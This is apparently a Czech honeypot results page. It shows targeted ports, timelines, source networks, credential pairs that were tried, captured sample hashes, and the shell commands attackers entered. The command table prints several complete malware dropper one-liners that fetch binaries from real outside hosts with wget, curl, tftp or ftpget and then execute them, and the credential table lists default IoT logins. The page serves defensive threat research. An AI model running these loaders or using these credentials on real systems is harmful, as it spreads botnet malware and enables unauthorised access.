Žebříček portů #
Hlavní tabulka experimentu: o které porty byl mezi útočníky největší zájem. Řadit jde podle libovolného sloupce, filtrovat podle serveru a hledat konkrétní port, rozsah nebo název služby. Na každý řádek se dá odkázat, například #port-3389.
| Port | Protokol | Obvyklá služba | Server | Pokusů | Unikátní IP | Podíl |
|---|---|---|---|---|---|---|
| 5901 | tcp | VNC | oba servery | 883 864 | 801 | 16,1 % |
| 3389 | tcp | RDP | oba servery | 734 148 | 2 425 | 13,4 % |
| 3389 | tcp | RDP | srv4 | 726 599 | 1 515 | 18,1 % |
| 5900 | tcp | VNC | oba servery | 707 172 | 1 343 | 12,9 % |
| 445 | tcp | SMB | oba servery | 459 930 | 6 055 | 8,4 % |
| 5901 | tcp | VNC | srv4 | 449 586 | 598 | 11,2 % |
| 5901 | tcp | VNC | srv3 | 434 278 | 655 | 29,7 % |
| 445 | tcp | SMB | srv3 | 415 953 | 5 570 | 28,4 % |
| 5900 | tcp | VNC | srv4 | 360 884 | 1 098 | 9,0 % |
| 5900 | tcp | VNC | srv3 | 346 288 | 1 176 | 23,7 % |
- Časové okno
- 21. 8. 2026 – 16. 9. 2026
- Zdrojová data
- honeypot-ports-aggregated-20260922.csv
- Skript
- bude zveřejněn
- Formát
- dokumentace polí
Vývoj v čase #
Objem událostí v čase, rozdělený na kampaně a základní šum, a pod ním počet unikátních IP adres. Jednotlivé kampaně dokázaly podle deníků agentů vyrobit většinu denního provozu. Bez rozdělení by graf klamal: kampaň by vypadala jako trend a její konec jako výpadek sběru.
Jak přesně se kampaň od základního šumu odděluje, určuje skript uvedený pod grafem.
Počet událostí
- Základní šum
- Kampaně
Unikátní IP adresy
Počet různých zdrojových IP adres v každém dni.
- srv3
- srv4
Unikátní IP adresy nejdou mezi servery sčítat – stejná adresa mohla útočit na oba. Každý server proto má vlastní čáru.
Ztlumené sloupce a prázdná kolečka jsou neúplná období: okno sběru začíná i končí ve 12:00 UTC a období useknuté zvoleným rozsahem je kratší než ostatní. Se sousedními je proto nesrovnávejte.
Zobrazit hodnoty jako tabulku
| Den (UTC) | Událostí | Kampaně | Základní šum | Unikátní IP srv3 | Unikátní IP srv4 |
|---|---|---|---|---|---|
| 22. 8. 2026 · neúplné | 82 303 | 59 843 | 22 460 | 547 | 1 870 |
| 23. 8. 2026 | 79 276 | 34 177 | 45 099 | 1 292 | 3 529 |
| 24. 8. 2026 | 48 928 | 10 775 | 38 153 | 1 429 | 3 309 |
| 25. 8. 2026 | 69 902 | 29 825 | 40 077 | 1 552 | 3 824 |
| 26. 8. 2026 | 68 792 | 28 709 | 40 083 | 1 552 | 3 775 |
| 27. 8. 2026 | 204 306 | 161 642 | 42 664 | 1 585 | 4 301 |
| 28. 8. 2026 | 201 823 | 159 044 | 42 779 | 1 364 | 4 083 |
| 29. 8. 2026 | 206 275 | 171 641 | 34 634 | 1 029 | 3 853 |
| 30. 8. 2026 | 185 689 | 148 263 | 37 426 | 975 | 4 176 |
| 31. 8. 2026 | 539 919 | 504 248 | 35 671 | 1 488 | 4 183 |
| 1. 9. 2026 | 720 200 | 666 265 | 53 935 | 1 573 | 4 500 |
| 2. 9. 2026 | 275 758 | 209 955 | 65 803 | 1 859 | 4 281 |
| 3. 9. 2026 | 274 675 | 227 972 | 46 703 | 1 621 | 4 343 |
| 4. 9. 2026 | 219 422 | 167 450 | 51 972 | 1 628 | 4 087 |
| 5. 9. 2026 | 154 023 | 95 631 | 58 392 | 1 535 | 4 117 |
| 6. 9. 2026 | 131 807 | 46 399 | 85 408 | 1 637 | 4 349 |
| 7. 9. 2026 | 184 403 | 94 877 | 89 526 | 1 494 | 4 402 |
| 8. 9. 2026 | 169 747 | 59 781 | 109 966 | 1 758 | 4 609 |
| 9. 9. 2026 | 177 572 | 48 861 | 128 711 | 1 733 | 4 671 |
| 10. 9. 2026 | 193 394 | 60 866 | 132 528 | 1 818 | 5 095 |
| 11. 9. 2026 | 210 418 | 63 267 | 147 151 | 1 747 | 5 402 |
| 12. 9. 2026 | 254 827 | 82 831 | 171 996 | 1 859 | 5 450 |
| 13. 9. 2026 | 236 911 | 105 016 | 131 895 | 1 854 | 5 434 |
| 14. 9. 2026 | 213 640 | 83 835 | 129 805 | 1 994 | 5 516 |
| 15. 9. 2026 | 272 074 | 159 141 | 112 933 | 1 884 | 5 303 |
| 16. 9. 2026 · neúplné | 101 115 | 28 713 | 72 402 | 1 386 | 3 449 |
- Časové okno
- 21. 8. 2026 – 16. 9. 2026
- Zdrojová data
- timeline-aggregated zatím nedostupné
- Skript
- bude zveřejněn
- Formát
- dokumentace polí
Mapa původu spojení #
Odkud spojení přicházela. Země se určuje podle registrace IP adresy, ne podle skutečné polohy útočníka – za adresou může být pronajatý server nebo napadený počítač kdekoli na světě. Přesná čísla jsou v tabulkách níže.
Mapu vykresluje služba Datawrapper; při jejím načtení se prohlížeč připojuje k jejím serverům. Otevřít mapu samostatně
Geografie a sítě #
Odkud provoz přicházel podle geolokace zdrojové IP adresy a ke kterým autonomním systémům (ASN) adresy patří. Geolokace ukazuje, kde je adresa registrovaná, ne kde sedí útočník.
Nejčastější země
Největší sítě (ASN)
| ASN | Síť | Událostí | Unikátní IP | Podíl |
|---|---|---|---|---|
| 51167 | CONTABO DE |
1 036 962 | 168 | 18,9 % |
| 22295 | ADVIN US |
924 717 | 7 | 16,9 % |
| 36352 | AS-COLOCROSSING US |
388 883 | 131 | 7,1 % |
| 212238 | CDNEXT GB |
385 498 | 98 | 7,0 % |
| 396982 | GOOGLE-CLOUD-PLATFORM US |
171 392 | 3 170 | 3,1 % |
| 14061 | DIGITALOCEAN-ASN US |
138 119 | 2 732 | 2,5 % |
| 45090 | TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited CN |
133 244 | 114 | 2,4 % |
| 209334 | MODAT-01 NL |
114 475 | 93 | 2,1 % |
| 197170 | TECHTIES-AS - TechTies Inc. SC |
110 821 | 185 | 2,0 % |
| 45102 | ALIBABA-CN-NET Alibaba US Technology Co., Ltd. CN |
101 319 | 303 | 1,8 % |
Zobrazit hodnoty jako tabulku
| Země | Událostí | Unikátní IP | Podíl |
|---|---|---|---|
| NG | 3 789 | 116 | 0,1 % |
| VE | 3 661 | 155 | 0,1 % |
| PT | 3 508 | 235 | 0,1 % |
| UZ | 2 937 | 181 | 0,1 % |
| AE | 2 789 | 52 | 0,1 % |
| KH | 2 695 | 18 | 0,0 % |
| MN | 2 308 | 47 | 0,0 % |
| GE | 1 790 | 43 | 0,0 % |
| AM | 1 782 | 47 | 0,0 % |
| RS | 1 751 | 24 | 0,0 % |
- Časové okno
- 21. 8. 2026 – 16. 9. 2026
- Zdrojová data
- geo-aggregated zatím nedostupné
- Skript
- bude zveřejněn
- Formát
- dokumentace polí
Přihlašovací údaje #
Kombinace jména a hesla, které útočníci zkoušeli, a nejzkoušenější uživatelská jména. Hodnoty jsou zobrazené přesně tak, jak přišly.
Nejzkoušenější uživatelská jména
Nejčastější kombinace
| Jméno | Heslo | Pokusů | Unikátní IP |
|---|---|---|---|
root |
(prázdné) | 3 084 | 219 |
admin |
admin |
2 649 | 849 |
enable\x00 |
linuxshell\x00 |
1 955 | 24 |
admin |
(prázdné) | 1 939 | 69 |
root |
xc3511 |
1 591 | 76 |
root |
admin |
1 529 | 160 |
root |
vizxv |
1 523 | 120 |
root |
123456 |
1 207 | 142 |
support |
support |
990 | 129 |
enable\x00 |
system\x00 |
983 | 27 |
- Časové okno
- 21. 8. 2026 – 16. 9. 2026
- Zdrojová data
- credentials-aggregated zatím nedostupné
- Skript
- bude zveřejněn
- Formát
- dokumentace polí
Co se dělo po přihlášení #
Příkazy, které útočníci zadali v emulovaném shellu, seřazené podle četnosti. Je to vstup útočníka, ne kód, který by na serveru skutečně běžel.
| Příkaz | Počet | Relací |
|---|---|---|
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-p.s-l.Sakura; chmod +x m-p.s-l.Sakura; ./m-p.s-l.Sakura; rm -rf m-p.s-l.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/s-h.4-.Sakura; chmod +x s-h.4-.Sakura; ./s-h.4-.Sakura; rm -rf s-h.4-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/x-8.6-.Sakura; chmod +x x-8.6-.Sakura; ./x-8.6-.Sakura; rm -rf x-8.6-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-6.Sakura; chmod +x a-r.m-6.Sakura; ./a-r.m-6.Sakura; rm -rf a-r.m-6.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/x-3.2-.Sakura; chmod +x x-3.2-.Sakura; ./x-3.2-.Sakura; rm -rf x-3.2-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-7.Sakura; chmod +x a-r.m-7.Sakura; ./a-r.m-7.Sakura; rm -rf a-r.m-7.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/p-p.c-.Sakura; chmod +x p-p.c-.Sakura; ./p-p.c-.Sakura; rm -rf p-p.c-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/i-5.8-6.Sakura; chmod +x i-5.8-6.Sakura; ./i-5.8-6.Sakura; rm -rf i-5.8-6.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-6.8-k.Sakura; chmod +x m-6.8-k.Sakura; ./m-6.8-k.Sakura; rm -rf m-6.8-k.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/p-p.c-.Sakura; chmod +x p-p.c-.Sakura; ./p-p.c-.Sakura; rm -rf p-p.c-.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-4.Sakura; chmod +x a-r.m-4.Sakura; ./a-r.m-4.Sakura; rm -rf a-r.m-4.Sakura
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-5.Sakura; chmod +x a-r.m-5.Sakura; ./a-r.m-5.Sakura; rm -rf a-r.m-5.Sakura
|
1 | 1 |
#!/bin/sh
wget http://74.81.40.155/iran.x86_64 -O /tmp/iran.x86_64 || curl http://74.81.40.155/iran.x86_64 -o /tmp/iran.x86_64; chmod 777 /tmp/iran.x86_64; /tmp/iran.x86_64 default;
wget http://74.81.40.155/iran.aarch64 -O /tmp/iran.aarch64 || curl http://74.81.40.155/iran.aarch64 -o /tmp/iran.aarch64; chmod 777 /tmp/iran.aarch64; /tmp/iran.aarch64 default;
wget http://74.81.40.155/iran.m68k -O /tmp/iran.m68k || curl http://74.81.40.155/iran.m68k -o /tmp/iran.m68k; chmod 777 /tmp/iran.m68k; /tmp/iran.m68k default;
wget http://74.81.40.155/iran.mips -O /tmp/iran.mips || curl http://74.81.40.155/iran.mips -o /tmp/iran.mips; chmod 777 /tmp/iran.mips; /tmp/iran.mips default;
wget http://74.81.40.155/iran.mipsel -O /tmp/iran.mipsel || curl http://74.81.40.155/iran.mipsel -o /tmp/iran.mipsel; chmod 777 /tmp/iran.mipsel; /tmp/iran.mipsel default;
wget http://74.81.40.155/iran.powerpc -O /tmp/iran.powerpc || curl http://74.81.40.155/iran.powerpc -o /tmp/iran.powerpc; chmod 777 /tmp/iran.powerpc; /tmp/iran.powerpc default;
wget http://74.81.40.155/iran.sparc -O /tmp/iran.sparc || curl http://74.81.40.155/iran.sparc -o /tmp/iran.sparc; chmod 777 /tmp/iran.sparc; /tmp/iran.sparc default;
wget http://74.81.40.155/iran.sh4 -O /tmp/iran.sh4 || curl http://74.81.40.155/iran.sh4 -o /tmp/iran.sh4; chmod 777 /tmp/iran.sh4; /tmp/iran.sh4 default;
wget http://74.81.40.155/iran.arc -O /tmp/iran.arc || curl http://74.81.40.155/iran.arc -o /tmp/iran.arc; chmod 777 /tmp/iran.arc; /tmp/iran.arc default;
wget http://74.81.40.155/iran.i486 -O /tmp/iran.i486 || curl http://74.81.40.155/iran.i486 -o /tmp/iran.i486; chmod 777 /tmp/iran.i486; /tmp/iran.i486 default;
wget http://74.81.40.155/iran.armv4l -O /tmp/iran.armv4l || curl http://74.81.40.155/iran.armv4l -o /tmp/iran.armv4l; chmod 777 /tmp/iran.armv4l; /tmp/iran.armv4l default;
wget http://74.81.40.155/iran.armv5l -O /tmp/iran.armv5l || curl http://74.81.40.155/iran.armv5l -o /tmp/iran.armv5l; chmod 777 /tmp/iran.armv5l; /tmp/iran.armv5l default;
wget http://74.81.40.155/iran.armv6l -O /tmp/iran.armv6l || curl http://74.81.40.155/iran.armv6l -o /tmp/iran.armv6l; chmod 777 /tmp/iran.armv6l; /tmp/iran.armv6l default;
|
1 | 1 |
#!/bin/sh
wget http://176.65.139.206/iran.x86_64 -O x86_64 || curl http://176.65.139.206/iran.x86_64 -o x86_64; chmod 777 x86_64; ./x86_64 catloader;
wget http://176.65.139.206/iran.aarch64 -O aarch64 || curl http://176.65.139.206/iran.aarch64 -o aarch64; chmod 777 aarch64; ./aarch64catloader;
wget http://176.65.139.206/iran.m68k -O m68k || curl http://176.65.139.206/iran.m68k -o m68k; chmod 777 m68k; ./m68k catloader;
wget http://176.65.139.206/iran.mips -O mips || curl http://176.65.139.206/iran.mips -o mips; chmod 777 mips; ./mips catloader;
wget http://176.65.139.206/iran.mipsel -O mipsel || curl http://176.65.139.206/iran.mipsel -o mipsel; chmod 777 mipsel; ./mipsel catloader;
wget http://176.65.139.206/iran.powerpc -O powerpc || curl http://176.65.139.206/iran.powerpc -o powerpc; chmod 777 powerpc; ./powerpc catloader;
wget http://176.65.139.206/iran.sparc -O sparc || curl http://176.65.139.206/iran.sparc -o sparc; chmod 777 sparc; ./sparc catloader;
wget http://176.65.139.206/iran.sh4 -O sh4 || curl http://176.65.139.206/iran.sh4 -o sh4; chmod 777 sh4; ./sh4 catloader;
wget http://176.65.139.206/iran.arc -O arc || curl http://176.65.139.206/iran.arc -o arc; chmod 777 arc; ./arc catloader;
wget http://176.65.139.206/iran.i486 -O i486 || curl http://176.65.139.206/iran.i486 -o i486; chmod 777 i486; ./i486 catloader;
wget http://176.65.139.206/iran.armv4l -O armv4l || curl http://176.65.139.206/iran.armv4l -o armv4l; chmod 777 armv4l; ./armv4l catloader;
wget http://176.65.139.206/iran.armv5l -O armv5l || curl http://176.65.139.206/iran.armv5l -o armv5l; chmod 777 armv5l; ./armv5l catloader;
wget http://176.65.139.206/iran.armv6l -O armv6l || curl http://176.65.139.206/iran.armv6l -o armv6l; chmod 777 armv6l; ./armv6l catloader;
wget http://176.65.139.206/iran.armv7l -O armv7l || curl http://176.65.139.206/iran.armv7l -o armv7l; chmod 777 armv7l; ./armv7l catloader;
|
1 | 1 |
':"<];#=!>``` |
1 | 1 |
(ftpget 77.90.185.66 f ftpget || busybox ftpget 77.90.185.66 f ftpget) > f; chmod 777 f; ./f; rm -rf f |
1 | 1 |
(tftp -g 77.90.185.66 -r tftp -l- || busybox tftp -g 77.90.185.66 -r tftp -l-) > t; chmod 777 t; ./t; rm -rf t |
1 | 1 |
(W=main_x86_64; M=$(uname -m 2>/dev/null); case "$M" in *aarch64*|*arm64*) W=main_arm64;; *mips*el*) W=main_mpsl;; *mips*) W=main_mips;; *armv7*|*armv6*) W=main_arm7;; *arm*) W=main_arm7;; esac); wget -qO /tmp/.pf http://pingg.sbs/$W 2>/dev/null || busybox wget -qO /tmp/.pf http://pingg.sbs/$W 2>/dev/null || curl -fsSL -o /tmp/.pf http://pingg.sbs/$W; chmod +x /tmp/.pf 2>/dev/null; /tmp/.pf $W >/dev/null 2>&1 & |
1 | 1 |
(wget http://77.90.185.66/wget -O- || busybox wget http://77.90.185.66/wget -O-) > w; chmod 777 w; ./w; rm -rf w |
1 | 1 |
/bin/busybox cat /proc/mounts; /bin/busybox htm6BVA6 |
1 | 1 |
/bin/busybox cat /proc/mounts; /bin/busybox jVQTSekR |
1 | 1 |
- Časové okno
- 21. 8. 2026 – 16. 9. 2026
- Zdrojová data
- attacker-commands-aggregated zatím nedostupné
- Skript
- bude zveřejněn
- Formát
- dokumentace polí
Zachycené vzorky #
Soubory, které se útočníci pokusili stáhnout nebo nahrát, podle typu a architektury.
Podle typu souboru
Podle architektury
| SHA-256 | Typ | Architektura | Velikost | Poprvé | Zachyceno | Vyhledat |
|---|---|---|---|---|---|---|
| 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | data | — | 1 B | 23. 8. 2026 16:54:42 | 492 | VirusTotal |
| 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | data | — | 1 B | 23. 8. 2026 10:04:58 | 330 | VirusTotal |
| f2e2ffc024ab99eb49fa207756481aa80713398142f30888aebace5706909b36 | data | — | 697 B | 23. 8. 2026 12:07:36 | 243 | VirusTotal |
| a6296a79f44e21b76604d2d2bbf795d2cf380f70e39d45fbf166707ff3b4a6a4 | script | — | 306 B | 22. 8. 2026 18:09:16 | 208 | VirusTotal |
| 4af5a5c98ad132095c6fbe7b02c242153a190a01cc321e50a916a0ca46fbaa62 | data | — | 9 B | 22. 8. 2026 18:09:19 | 206 | VirusTotal |
| 4af5a5c98ad132095c6fbe7b02c242153a190a01cc321e50a916a0ca46fbaa62 | data | — | 9 B | 22. 8. 2026 15:49:53 | 205 | VirusTotal |
| a9b1c85a7bd78dd1112ecc75c9070ea8c53078831a17aa09ebeb287fe6e21b72 | data | — | 9 B | 7. 9. 2026 11:48:13 | 59 | VirusTotal |
| 1193dde1c831808bf6f2db6f5b850b846b8a7f870873ec3b8a347f21cc5d96e3 | data | — | 9 B | 7. 9. 2026 11:48:13 | 59 | VirusTotal |
| 14049d077b887cbb8060d223ff9626664a044a8c3145f6a2b95a325df36b279b | data | — | 7 B | 13. 9. 2026 15:31:53 | 58 | VirusTotal |
| 43728fbfb98bb39ff61a2db0fc2905bd6937997062b05b9ab8b186fdee18c09a | data | — | 399 B | 23. 8. 2026 00:49:29 | 47 | VirusTotal |
- Časové okno
- 21. 8. 2026 – 16. 9. 2026
- Zdrojová data
- samples-aggregated zatím nedostupné
- Skript
- bude zveřejněn
- Formát
- dokumentace polí
Srovnání serverů #
Kolik provozu přinesla větší plocha a v čem se oba servery liší strukturou.
| Ukazatel | srv3 | srv4 | srv4 / srv3 |
|---|---|---|---|
| Pokusů o spojení (žebříček portů) | 1 462 877 | 4 014 322 | 2,7× |
| Zasažených portů | 45 | 58 628 | 1 302,8× |
| Událostí (vývoj v čase) | 1 462 877 | 4 014 322 | 2,7× |
srv3 nejčastější porty
srv4 nejčastější porty
- Časové okno
- 21. 8. 2026 – 16. 9. 2026
- Zdrojová data
- honeypot-ports-aggregated-20260922.csv, timeline-aggregated zatím nedostupné
- Skript
- bude zveřejněn
- Formát
- dokumentace polí
Narazili jste na chybu, chybějící data nebo únik citlivých údajů? Nahlaste problém